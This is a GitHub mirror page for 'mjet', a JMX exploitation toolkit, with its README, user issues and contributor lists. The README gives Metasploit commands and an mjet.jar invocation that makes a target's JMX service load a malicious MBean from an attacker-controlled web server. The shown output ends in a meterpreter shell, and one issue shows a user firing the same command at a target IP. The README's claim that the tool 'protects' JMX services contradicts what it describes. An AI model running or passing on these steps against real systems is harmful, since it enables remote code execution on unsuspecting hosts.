GithubHelp home page GithubHelp logo

mjet's Introduction

mjet

Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit

mjet is a tool that can be used to protect insecure configured JMX services. It is based on the blog post "Exploiting JMX-RMI" from Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" and can be used to execute arbitrary Metasploit payloads on the target system.

Mjet was originally planned to be a complete attack toolkit, however we noticed that the Metasploit Github repository contains a pull request which will provide basic Java RMI/serialization support in native ruby. This is awesome and removes the Java dependency. So we stopped developing this tool and create metasploit modules in the near future.

mjet consists of the following parts:

  • A metasploit module which emulates a "mlet Server". This is basically a web server which hosts a html file that contains a mlet tag
  • A ManagedBean that is changed by the mlet server module to include the selected payload
  • A jar archive that is used to contact the insecure JMX service.

Installation (with the github version of Metasploit)

  • Copy the "MBean" folder to "data/java/metasploit"
  • Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

Usage

The example uses following systems: attacker: 192.168.178.1 target: 192.168.178.200, JMX service running on tcp port 1616

  • Configure/start the metasploit module "java_mlet_server". The module will run as a background job
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

Use mjet.jar to connect to the vulnerable JMX service and provide the URL to the MLet Web server...

java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

and enjoy your meterpreter shell :-)

mjet's People

Contributors

h0ng10 avatar

Stargazers

avatar cobra1024 avatar Huy (Valen) Võ avatar 惊蛰 avatar xzxx0z avatar avatar Rubby avatar avatar Christian Håland avatar nice0e3 avatar avatar avatar LSA avatar bronny avatar WinkAir avatar Ryota Sakai avatar Y4tacker avatar avatar avatar Yongting Chen avatar avatar avatar avatar avatar muuk avatar angelwhu avatar thelostworld avatar avatar avatar Peter Lee JW avatar avatar avatar avatar Lau Spence avatar fe1w0 avatar 淚笑 avatar avatar Douglas S. Santos avatar 5l1v3r1 avatar tr1ple avatar avatar b1ngz avatar Hu3sky avatar palaziv avatar avatar avatar SuperZero avatar avatar Lucifaer avatar m7xss. avatar shadowsock5 avatar Green Dog avatar avatar Martin Zhou avatar avatar Henshin avatar Mick avatar shad0w_walker avatar Igor K avatar Mi-cc5ec avatar avatar avatar avatar avatar Joseph McPeters avatar z3r0yu avatar 团队毒瘤 avatar you see see you avatar 突突兔 avatar Weiho avatar avatar avatar yu avatar avatar Cryin' avatar imslowmist avatar Nothing avatar avatar 0w3 avatar B0y1n4o4 avatar avatar avatar Not Just Big avatar Scott Judson avatar 张德帅 avatar Voidfyoo avatar In Shell avatar avatar Saar avatar scanf avatar Bearcat avatar .T. avatar Lyne avatar Gorgias avatar K3vin avatar Sud0h4c avatar Owen Gong avatar neargle avatar langu_xyz avatar avatar

Watchers

Minh-Triet Pham Tran avatar James Cloos avatar Andre Gironda avatar avatar avatar avatar avatar

Forkers

carnal0wnage cnbird1999 zhuyue1314 hotydjer dreamcometure getcode2git xfkxfk vf3ng asudhak loveshell bahaihe olivierh59500 totwo tuian dennisantunes w00t3k gcxtx long80a caledoniaproject explorer1092 odomrob wolfscrew wlongbin imulmul 5l1v3r1 sanstardust rheehot freefv r3dc4t0x00 sunpeak

mjet's Issues

Need some explanation about the install part

Hey,

first of all thanks for the code.

I'm trying to use the exploit over Kali linux 2 with metasploit framwork (the default metasploit that comes with the kali linux vm).
this is exactly what i did:

  1. download the files from here
  2. compiled the 3 java classes with javac command on the kali linux vm
  3. now i have the ruby file & the compiled classes

from now i don't know how to continue, i can't find the path specified for installation of the MBean dir or the path for the ruby file neither.

thanks a lot.

No such file or directory @ rb_sysopen

Hi,

I did what you said in installation part but I am getting this error when I try to use java_mlet_server.rb module.
[-] Exploit failed: No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/java/metasploit/Payload.class

untitled

as you see files are where they should be.

javax.naming.NameNotFoundException

i send payload :
./java -jar /root/mjet/mjet.jar -t 192.168.197.25 -p 1099 -u http://192.168.197.75:8080/mlet/

MJET - Mogwai Security JMX Exploitation Toolkit 0.1

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.197.25:1099/jmxrmi ...
java.io.IOException: Failed to retrieve RMIServer stub: javax.naming.NameNotFoundException: jmxrmi
at javax.management.remote.rmi.RMIConnector.connect(RMIConnector.java:369)
at javax.management.remote.JMXConnectorFactory.connect(JMXConnectorFactory.java:268)
at javax.management.remote.JMXConnectorFactory.connect(JMXConnectorFactory.java:227)
at de.mogwaisecurity.lab.mjet.Mjet.pwnJMXService(Mjet.java:76)
at de.mogwaisecurity.lab.mjet.Mjet.main(Mjet.java:40)
Caused by: javax.naming.NameNotFoundException: jmxrmi
at com.sun.jndi.rmi.registry.RegistryContext.lookup(RegistryContext.java:116)
at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:203)
at javax.naming.InitialContext.lookup(InitialContext.java:411)
at javax.management.remote.rmi.RMIConnector.findRMIServerJNDI(RMIConnector.java:1929)
at javax.management.remote.rmi.RMIConnector.findRMIServer(RMIConnector.java:1896)
at javax.management.remote.rmi.RMIConnector.connect(RMIConnector.java:286)
... 4 more

but ,is look at is not work.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.